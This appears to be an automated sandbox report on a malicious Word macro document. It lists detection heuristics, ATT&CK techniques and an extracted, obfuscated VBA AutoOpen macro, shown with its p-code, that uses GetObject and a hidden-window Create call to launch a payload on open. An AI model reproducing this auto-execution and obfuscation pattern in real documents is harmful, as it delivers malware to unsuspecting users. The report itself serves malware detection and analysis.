MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro that utilizes GetObject. This indicates an attempt to execute a malicious payload upon opening. The presence of legacy WordBasic markers and the GetObject call strongly suggest a macro-based execution technique. No specific family could be identified, but the technique is common for initial payload delivery.
Heuristics 7
-
ClamAV: Doc.Malware.Dsau-6904244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsau-6904244-0
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13011 bytes |
SHA-256: a1d00b552e7e61b5fda15317d527c4d5fb1d19d86f7637f31c6e44099716d19b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZDGQBc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sAxoAx"
Attribute VB_Base = "0{B00C1D2A-0EC5-4834-BD52-55DCDDDB556B}{E8DB5D3B-4C2A-40DF-A84C-3A33A884B904}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "WDBBAQA"
Sub autoopen()
On Error Resume Next
If SGAQDA = O1U_A4G Then
XQBBXB = (354164903)
Rkxc1cAD = (uAXZcA_B * Log(185537904 + Atn(90458249 * ZUAAUw_)) + XBwAAA1c + CDbl(PAcGXA - Sqr(UUxABAoA / CBool(619123844 / 648437584) + GoAo_wc - Rnd(lXBQcwAZ))) * 717692923 * 140857080)
SD_A1A = (876277793)
End If
If joxXB_A = zw1kAo Then
ABCBXAAU = (907333972)
kDDwxZ = (Dw1A1U * Log(906077285 + Atn(939496631 * ABGwAUA)) + Z4DQCDAw + CDbl(wA4A4xA - Sqr(jA11_x / CBool(904290008 / 247771865) + Qc4AA4A - Rnd(TUwAkDZ))) * 104070901 * 407975498)
K1GQ4A = (208115342)
End If
If vAkDw4_ = YXAXAx Then
w1DAAAk = (911857544)
V_1AAA_ = (iQAwZUU * Log(699515691 + Atn(578272690 * fCwUAZQQ)) + A_AXDQQA + CDbl(lBAUAXAB - Sqr(jQAAA_ / CBool(234002449 / 875593952) + GG_BGDDx - Rnd(joUoAQAQ))) * 484803153 * 720327324)
WZX_1x = (386064342)
End If
Set awcDAXDw = GetObject(ExAADAAB + sAxoAx.E4w_Ak + GZUAB1)
If zDBAxA = i1AAAxAw Then
BB4ZcQ = (370313042)
wxABAAZ = (BoUABGQA * Log(312109724 + Atn(756444821 * wB_xAB)) + UAADAAB + CDbl(TBGwAXX - Sqr(NAABw4A / CBool(175736737 / 990808190) + s41xDA - Rnd(SAABBU))) * 930200640 * 173715715)
iD1AA4 = (573405040)
End If
If howAUx = tcBQA1 Then
JUD1Ux4A = (587887753)
rCU_ZB = (cUQG4AZZ * Log(697222529 + Atn(285234511 * EAAZADo)) + PBAAcCD + CDbl(EAC4BQU - Sqr(LAZoD1x / CBool(942634415 / 929334407) + KACAAAAA - Rnd(EAxXXUA))) * 480444825 * 68796775)
K4GBAU = (230801638)
End If
If KAxAGDA4 = LDXCAk Then
zkBAoGcA = (543619911)
vQABAB = (LZQA1AC_ * Log(55987397 + Atn(23136848 * YCA_AX)) + R1ABw_ + CDbl(uZADAwD - Sqr(UAQAwA / CBool(730719312 / 839687655) + z4BACZC - Rnd(iAZAA_BB))) * 984468410 * 611468616)
dcAAC4 = (239226092)
End If
awcDAXDw.ShowWindow = 711727 - 711727
If zQAwQXA = QBc4C_A Then
kADBAAA = (450440259)
nAwDBcU = (sAUwAw * Log(473041508 + Atn(688292563 * jAZoGAU)) + a1DD__ + CDbl(FQk4AAA - Sqr(OBA4AC4A / CBool(49112116 / 526349501) + bC_QQAc - Rnd(wQAoDAU))) * 20994649 * 425511610)
uQBQ_QU = (364955007)
End If
If XQQUAw = CUAwow Then
VAokkBw = (919364621)
OGCQDA = (wA_4ZDk * Log(6426374 + Atn(849015688 * TAA4QDA)) + u4QBBA + CDbl(NQAwwD1X - Sqr(GQxkcAZA / CBool(37212185 / 126409053) + WAxGAA4 - Rnd(tUDAAc))) * 179336256 * 152281553)
UD1QD1Q4 = (646481162)
End If
GetObject(wwcBBGA + sAxoAx.cDDAAAxB + HwQAD4UA). _
Create@ pACA_A + sAxoAx.NBwA1D + QcAAADBB + sAxoAx.Z4AkAkZ + pDAXUowA + sAxoAx.wkUQUBZA + YoB1D1_, QZAAAZAQ, awcDAXDw, WAwGAAA_
If wACxAUQ = HcBDQA Then
mGAU4Ac_ = (648909886)
sD4xBUAC = (a4ADAUk * Log(380977896 + Atn(920961872 * YAGCAA)) + wQZUCAA + CDbl(zUBcCAwD - Sqr(oxBDAxQ / CBool(388970675 / 942189567) + WG4AxD - Rnd(ZAGoAUwA))) * 60028052 * 537514096)
sAkQZA_ = (777214553)
End If
If IAxUDAB = nGBAGw Then
SAABAo4 = (613193940)
sXAAwUAo = (LAU4xC4w * Log(69644910 + Atn(179403780 * ZCCG1Ak)) + EAAACcD + CDbl(EQAQAwwA - Sqr(NUQAAA / CBool(682560908 / 94327741) + VAAx1AU - Rnd(DcAQwDQD))) * 958521476 * 626994569)
NDAAxQU = (677554219)
End If
If qZDDDA = I4D4cCA Then
sUo1CXAQ = (284786612)
QG4UoC = (lDwACQAo * Log(537229880 + Atn(964221077 * jXAZDoco)) + cQDUkZxG + CDbl(cDAAAQ - Sqr(KAUBAoQ / CBool(117643941 / 936060523) + wCQQBA - Rnd(LAABBww))) * 148071599 * 533879942)
sACZGcA = (967372682)
End If
End Sub
' Processing file: /tmp/qstore__adgorvf
' ===============================================================================
' Module streams:
' Macros/VBA/ZDGQBc - 1104 bytes
' Macros/VBA/sAxoAx - 1154 bytes
' Macros/VBA/WDBBAQA - 6138 bytes
' Line #0:
' FuncDefn (Sub WDBBAQA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld SGAQDA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x20A7 0x151C
' Paren
' St O1U_A4G
' Line #4:
' Ld Rkxc1cAD
' LitDI4 0x1570 0x0B0F
' LitDI4 0x4889 0x0564
' Ld uAXZcA_B
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZUAAUw_
' Add
' Ld XBwAAA1c
' Ld PAcGXA
' LitDI4 0x1484 0x24E7
' LitDI4 0x5F50 0x26A6
' Div
' Coerce (Bool)
' Div
' Ld UUxABAoA
' Add
' Ld GoAo_wc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x1FFB 0x2AC7
' Mul
' LitDI4 0x4EF8 0x0865
' Mul
' Add
' Paren
' St XQBBXB
' Line #5:
' LitDI4 0xF021 0x343A
' Paren
' St lXBQcwAZ
' Line #6:
' EndIfBlock
' Line #7:
' Ld SD_A1A
' Ld joxXB_A
' Eq
' IfBlock
' Line #8:
' LitDI4 0xD154 0x3614
' Paren
' St zw1kAo
' Line #9:
' Ld kDDwxZ
' LitDI4 0xA465 0x3601
' LitDI4 0x94B7 0x37FF
' Ld Dw1A1U
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ABGwAUA
' Add
' Ld Z4DQCDAw
' Ld wA4A4xA
' LitDI4 0x5ED8 0x35E6
' LitDI4 0xB2D9 0x0EC4
' Div
' Coerce (Bool)
' Div
' Ld jA11_x
' Add
' Ld Qc4AA4A
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xFEF5 0x0633
' Mul
' LitDI4 0x364A 0x1851
' Mul
' Add
' Paren
' St ABCBXAAU
' Line #10:
' LitDI4 0x968E 0x0C67
' Paren
' St TUwAkDZ
' Line #11:
' EndIfBlock
' Line #12:
' Ld K1GQ4A
' Ld vAkDw4_
' Eq
' IfBlock
' Line #13:
' LitDI4 0xD788 0x3659
' Paren
' St YXAXAx
' Line #14:
' Ld V_1AAA_
' LitDI4 0xC32B 0x29B1
' LitDI4 0xBDB2 0x2277
' Ld iQAwZUU
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld fCwUAZQQ
' Add
' Ld A_AXDQQA
' Ld lBAUAXAB
' LitDI4 0x9811 0x0DF2
' LitDI4 0x80E0 0x3430
' Div
' Coerce (Bool)
' Div
' Ld jQAAA_
' Add
' Ld GG_BGDDx
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x8251 0x1CE5
' Mul
' LitDI4 0x529C 0x2AEF
' Mul
' Add
' Paren
' St w1DAAAk
' Line #15:
' LitDI4 0xDFD6 0x1702
' Paren
' St joUoAQAQ
' Line #16:
' EndIfBlock
' Line #17:
' SetStmt
' Ld GetObject
' Ld MSForms
' MemLd ExAADAAB
' Add
' Ld E4w_Ak
' Add
' ArgsLd awcDAXDw 0x0001
' Set WZX_1x
' Line #18:
' Ld GZUAB1
' Ld zDBAxA
' Eq
' IfBlock
' Line #19:
' LitDI4 0x8752 0x1612
' Paren
' St i1AAAxAw
' Line #20:
' Ld wxABAAZ
' LitDI4 0x6A9C 0x129A
' LitDI4 0x6E95 0x2D16
' Ld BoUABGQA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wB_xAB
' Add
' Ld UAADAAB
' Ld TBGwAXX
' LitDI4 0x87A1 0x0A79
' LitDI4 0x887E 0x3B0E
' Div
' Coerce (Bool)
' Div
' Ld NAABw4A
' Add
' Ld s41xDA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xBC40 0x3771
' Mul
' LitDI4 0xB103 0x0A5A
' Mul
' Add
' Paren
' St BB4ZcQ
' Line #21:
' LitDI4 0x7770 0x222D
' Paren
' St SAABBU
' Line #22:
' EndIfBlock
' Line #23:
' Ld iD1AA4
' Ld howAUx
' Eq
' IfBlock
' Line #24:
' LitDI4 0x7489 0x230A
' Paren
' St tcBQA1
' Line #25:
' Ld rCU_ZB
' LitDI4 0xC581 0x298E
' LitDI4 0x554F 0x1100
' Ld cUQG4AZZ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld EAAZADo
' Add
' Ld PBAAcCD
' Ld EAC4BQU
' LitDI4 0x75AF 0x382F
' LitDI4 0x8487 0x3764
' Div
' Coerce (Bool)
' Div
' Ld LAZoD1x
' Add
' Ld KACAAAAA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x0199 0x1CA3
' Mul
' LitDI4 0xC167 0x0419
' Mul
' Add
' Paren
' St JUD1Ux4A
' Line #26:
' LitDI4 0xC0E6 0x0DC1
' Paren
' St EAxXXUA
' Line #27:
' EndIfBlock
' Line #28:
' Ld K4GBAU
' Ld KAxAGDA4
' Eq
' IfBlock
' Line #29:
' LitDI4 0xFB47 0x2066
' Paren
' St LDXCAk
' Line #30:
' Ld vQABAB
' LitDI4 0x4CC5 0x0356
' LitDI4 0x0A50 0x0161
' Ld LZQA1AC_
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YCA_AX
' Add
' Ld R1ABw_
' Ld uZADAwD
' LitDI4 0xE450 0x2B8D
' LitDI4 0x9DE7 0x320C
' Div
' Coerce (Bool)
' Div
' Ld UAQAwA
' Add
' Ld z4BACZC
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xCBBA 0x3AAD
' Mul
' LitDI4 0x4548 0x2472
' Mul
' Add
' Paren
' St zkBAoGcA
' Line #31:
' LitDI4 0x4CEC 0x0E42
' Paren
' St iAZAA_BB
' Line #32:
' EndIfBlock
' Line #33:
' LitDI4 0xDC2F 0x000A
' LitDI4 0xDC2F 0x000A
' Sub
' Ld WZX_1x
' MemSt dcAAC4
' Line #34:
' Ld ShowWindow
' Ld zQAwQXA
' Eq
' IfBlock
' Line #35:
' LitDI4 0x2C43 0x1AD9
' Paren
' St QBc4C_A
' Line #36:
' Ld nAwDBcU
' LitDI4 0x0A64 0x1C32
' LitDI4 0x82D3 0x2906
' Ld sAUwAw
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jAZoGAU
' Add
' Ld a1DD__
' Ld FQk4AAA
' LitDI4 0x6434 0x02ED
' LitDI4 0x74BD 0x1F5F
' Div
' Coerce (Bool)
' Div
' Ld OBA4AC4A
' Add
' Ld bC_QQAc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x5A59 0x0140
' Mul
' LitDI4 0xCABA 0x195C
' Mul
' Add
' Paren
' St kADBAAA
' Line #37:
' LitDI4 0xC57F 0x15C0
' Paren
' St wQAoDAU
' Line #38:
' EndIfBlock
' Line #39:
' Ld uQBQ_QU
' Ld XQQUAw
' Eq
' IfBlock
' Line #40:
' LitDI4 0x640D 0x36CC
' Paren
' St CUAwow
' Line #41:
' Ld OGCQDA
' LitDI4 0x0F06 0x0062
' LitDI4 0xF388 0x329A
' Ld wA_4ZDk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld TAA4QDA
' Add
' Ld u4QBBA
' Ld NQAwwD1X
' LitDI4 0xD019 0x0237
' LitDI4 0xD95D 0x0788
' Div
' Coerce (Bool)
' Div
' Ld GQxkcAZA
' Add
' Ld WAxGAA4
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x7440 0x0AB0
' Mul
' LitDI4 0xA1D1 0x0913
' Mul
' Add
' Paren
' St VAokkBw
' Line #42:
' LitDI4 0x850A 0x2688
' Paren
' St tUDAAc
' Line #43:
' EndIfBlock
' Line #44:
' LineCont 0x0004 0B 00 00 00
' Ld Create
' Ld MSForms
' MemLd pACA_A
' Add
' Ld NBwA1D
' Add
' Ld MSForms
' MemLd QcAAADBB
' Add
' Ld Z4AkAkZ
' Add
' Ld MSForms
' MemLd pDAXUowA
' Add
' Ld wkUQUBZA
' Add
' Ld YoB1D1_
' Ld WZX_1x
' Ld QZAAAZAQ
' Ld UD1QD1Q4
' Ld MSForms
' MemLd wwcBBGA
' Add
' Ld cDDAAAxB
' Add
' ArgsLd awcDAXDw 0x0001
' ArgsMemCall HwQAD4UA@ 0x0004
' Line #45:
' Ld WAwGAAA_
' Ld wACxAUQ
' Eq
' IfBlock
' Line #46:
' LitDI4 0x943E 0x26AD
' Paren
' St HcBDQA
' Line #47:
' Ld sD4xBUAC
' LitDI4 0x42E8 0x16B5
' LitDI4 0xC350 0x36E4
' Ld a4ADAUk
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld YAGCAA
' Add
' Ld wQZUCAA
' Ld zUBcCAwD
' LitDI4 0x38B3 0x172F
' LitDI4 0xABFF 0x3828
' Div
' Coerce (Bool)
' Div
' Ld oxBDAxQ
' Add
' Ld WG4AxD
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xF494 0x0393
' Mul
' LitDI4 0xD070 0x2009
' Mul
' Add
' Paren
' St mGAU4Ac_
' Line #48:
' LitDI4 0x5A59 0x2E53
' Paren
' St ZAGoAUwA
' Line #49:
' EndIfBlock
' Line #50:
' Ld sAkQZA_
' Ld IAxUDAB
' Eq
' IfBlock
' Line #51:
' LitDI4 0x98D4 0x248C
' Paren
' St nGBAGw
' Line #52:
' Ld sXAAwUAo
' LitDI4 0xB26E 0x0426
' LitDI4 0x7C04 0x0AB1
' Ld LAU4xC4w
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld ZCCG1Ak
' Add
' Ld EAAACcD
' Ld EQAQAwwA
' LitDI4 0x0D8C 0x28AF
' LitDI4 0x53BD 0x059F
' Div
' Coerce (Bool)
' Div
' Ld NUQAAA
' Add
' Ld VAAx1AU
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xE084 0x3921
' Mul
' LitDI4 0x2D89 0x255F
' Mul
' Add
' Paren
' St SAABAo4
' Line #53:
' LitDI4 0xA82B 0x2862
' Paren
' St DcAQwDQD
' Line #54:
' EndIfBlock
' Line #55:
' Ld NDAAxQU
' Ld qZDDDA
' Eq
' IfBlock
' Line #56:
' LitDI4 0x7FB4 0x10F9
' Paren
' St I4D4cCA
' Line #57:
' Ld QG4UoC
' LitDI4 0x7A38 0x2005
' LitDI4 0xD895 0x3978
' Ld lDwACQAo
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld jXAZDoco
' Add
' Ld cQDUkZxG
' Ld cDAAAQ
' LitDI4 0x1AA5 0x0703
' LitDI4 0x266B 0x37CB
' Div
' Coerce (Bool)
' Div
' Ld KAUBAoQ
' Add
' Ld wCQQBA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x64AF 0x08D3
' Mul
' LitDI4 0x5C86 0x1FD2
' Mul
' Add
' Paren
' St sUo1CXAQ
' Line #58:
' LitDI4 0xEF8A 0x39A8
' Paren
' St LAABBww
' Line #59:
' EndIfBlock
' Line #60:
' EndSub
' Line #61:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.